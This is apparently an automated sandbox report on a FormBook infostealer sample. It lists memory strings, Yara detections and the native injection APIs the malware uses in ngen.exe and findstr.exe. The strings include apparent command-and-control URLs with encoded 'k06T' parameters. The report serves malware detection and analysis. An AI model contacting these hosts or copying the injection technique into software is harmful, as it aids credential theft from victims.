Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2h
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfQ
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: findstr.exe, 00000007.00000002.3924355546.0000000003230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: findstr.exe, 00000007.00000003.2520276379.0000000008026000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: findstr.exe, 00000007.00000002.3926054651.00000000041F6000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003876000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.0000000028C66000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: findstr.exe, 00000007.00000002.3926054651.000000000451A000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000003B9A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkji
Source: findstr.exe, 00000007.00000002.3926054651.0000000004B62000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.00000000041E2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0042B593 NtClose, 4_2_0042B593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C35C0 NtCreateMutant,LdrInitializeThunk, 4_2_058C35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_058C2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_058C2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2B60 NtClose,LdrInitializeThunk, 4_2_058C2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C4650 NtSuspendThread, 4_2_058C4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3090 NtSetValueKey, 4_2_058C3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3010 NtOpenDirectoryObject, 4_2_058C3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C4340 NtSetContextThread, 4_2_058C4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2DB0 NtEnumerateKey, 4_2_058C2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2DD0 NtDelayExecution, 4_2_058C2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2D00 NtSetInformationFile, 4_2_058C2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3D10 NtOpenProcessToken, 4_2_058C3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2D10 NtMapViewOfSection, 4_2_058C2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2D30 NtUnmapViewOfSection, 4_2_058C2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C3D70 NtOpenThread, 4_2_058C3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2CA0 NtQueryInformationToken, 4_2_058C2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2CC0 NtQueryVirtualMemory, 4_2_058C2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2CF0 NtOpenProcess, 4_2_058C2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2C00 NtQueryInformationProcess, 4_2_058C2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2C60 NtCreateKey, 4_2_058C2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2F90 NtProtectVirtualMemory, 4_2_058C2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2FA0 NtQuerySection, 4_2_058C2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2FB0 NtResumeThread, 4_2_058C2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2FE0 NtCreateFile, 4_2_058C2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2F30 NtCreateSection, 4_2_058C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2F60 NtCreateProcessEx, 4_2_058C2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2E80 NtReadVirtualMemory, 4_2_058C2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2EA0 NtAdjustPrivilegesToken, 4_2_058C2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2EE0 NtQueueApcThread, 4_2_058C2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2E30 NtWriteVirtualMemory, 4_2_058C2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C39B0 NtGetContextThread, 4_2_058C39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2B80 NtQueryInformationFile, 4_2_058C2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2BA0 NtEnumerateValueKey, 4_2_058C2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2BE0 NtQueryValueKey, 4_2_058C2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2BF0 NtAllocateVirtualMemory, 4_2_058C2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2AB0 NtWaitForSingleObject, 4_2_058C2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2AD0 NtReadFile, 4_2_058C2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2AF0 NtWriteFile, 4_2_058C2AF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C4340 NtSetContextThread,LdrInitializeThunk, 7_2_036C4340
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C4650 NtSuspendThread,LdrInitializeThunk, 7_2_036C4650
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C35C0 NtCreateMutant,LdrInitializeThunk, 7_2_036C35C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2B60 NtClose,LdrInitializeThunk, 7_2_036C2B60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2AF0 NtWriteFile,LdrInitializeThunk, 7_2_036C2AF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2AD0 NtReadFile,LdrInitializeThunk, 7_2_036C2AD0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C39B0 NtGetContextThread,LdrInitializeThunk, 7_2_036C39B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2F30 NtCreateSection,LdrInitializeThunk, 7_2_036C2F30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2FE0 NtCreateFile,LdrInitializeThunk, 7_2_036C2FE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2FB0 NtResumeThread,LdrInitializeThunk, 7_2_036C2FB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_036C2EE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_036C2D30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_036C2D10
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_036C2DF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2DD0 NtDelayExecution,LdrInitializeThunk, 7_2_036C2DD0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2C60 NtCreateKey,LdrInitializeThunk, 7_2_036C2C60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_036C2C70
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_036C2CA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3010 NtOpenDirectoryObject, 7_2_036C3010
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3090 NtSetValueKey, 7_2_036C3090
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2BE0 NtQueryValueKey, 7_2_036C2BE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2BF0 NtAllocateVirtualMemory, 7_2_036C2BF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2BA0 NtEnumerateValueKey, 7_2_036C2BA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2B80 NtQueryInformationFile, 7_2_036C2B80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2AB0 NtWaitForSingleObject, 7_2_036C2AB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2F60 NtCreateProcessEx, 7_2_036C2F60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2FA0 NtQuerySection, 7_2_036C2FA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2F90 NtProtectVirtualMemory, 7_2_036C2F90
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2E30 NtWriteVirtualMemory, 7_2_036C2E30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2EA0 NtAdjustPrivilegesToken, 7_2_036C2EA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2E80 NtReadVirtualMemory, 7_2_036C2E80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3D70 NtOpenThread, 7_2_036C3D70
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2D00 NtSetInformationFile, 7_2_036C2D00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C3D10 NtOpenProcessToken, 7_2_036C3D10
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2DB0 NtEnumerateKey, 7_2_036C2DB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2C00 NtQueryInformationProcess, 7_2_036C2C00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2CF0 NtOpenProcess, 7_2_036C2CF0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C2CC0 NtQueryVirtualMemory, 7_2_036C2CC0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E68090 NtClose, 7_2_02E68090
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E68000 NtDeleteFile, 7_2_02E68000
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E67F20 NtReadFile, 7_2_02E67F20
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E67DC0 NtCreateFile, 7_2_02E67DC0
Detected potential crypto function
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658583480 0_2_00007FF658583480
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658581D80 0_2_00007FF658581D80
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65856D1F0 0_2_00007FF65856D1F0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658556AA0 0_2_00007FF658556AA0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658563AC0 0_2_00007FF658563AC0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65855B2C0 0_2_00007FF65855B2C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65857C3A0 0_2_00007FF65857C3A0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585863B0 0_2_00007FF6585863B0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658571384 0_2_00007FF658571384
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65855BB60 0_2_00007FF65855BB60
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65858E4B0 0_2_00007FF65858E4B0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658585490 0_2_00007FF658585490
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65857BC70 0_2_00007FF65857BC70
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658561C50 0_2_00007FF658561C50
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658562D00 0_2_00007FF658562D00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585535A0 0_2_00007FF6585535A0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658582DB0 0_2_00007FF658582DB0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658586D80 0_2_00007FF658586D80
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658582580 0_2_00007FF658582580
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658567DC0 0_2_00007FF658567DC0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658557EA0 0_2_00007FF658557EA0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658569660 0_2_00007FF658569660
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65856FE70 0_2_00007FF65856FE70
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585846E0 0_2_00007FF6585846E0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF6585EC880 0_2_00007FF6585EC880
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658576860 0_2_00007FF658576860
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658585060 0_2_00007FF658585060
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF65857B850 0_2_00007FF65857B850
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658571930 0_2_00007FF658571930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004017BF 4_2_004017BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00402820 4_2_00402820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004048A4 4_2_004048A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0042D9C3 4_2_0042D9C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041019A 4_2_0041019A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004101A3 4_2_004101A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00401230 4_2_00401230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00403280 4_2_00403280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00416A83 4_2_00416A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004103C3 4_2_004103C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0040E443 4_2_0040E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00401C70 4_2_00401C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004024FC 4_2_004024FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00402500 4_2_00402500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05950591 4_2_05950591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592D5B0 4_2_0592D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05947571 4_2_05947571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593E4F6 4_2_0593E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594F43F 4_2_0594F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05942446 4_2_05942446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594F7B0 4_2_0594F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588C7C0 4_2_0588C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B4750 4_2_058B4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AC6E0 4_2_058AC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589B1B0 4_2_0589B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059501AA 4_2_059501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059481CC 4_2_059481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880100 4_2_05880100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C516C 4_2_058C516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595B16B 4_2_0595B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F0CC 4_2_0593F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594F0E0 4_2_0594F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059470E9 4_2_059470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D739A 4_2_058D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059503E6 4_2_059503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E3F0 4_2_0589E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594132D 4_2_0594132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594A352 4_2_0594A352
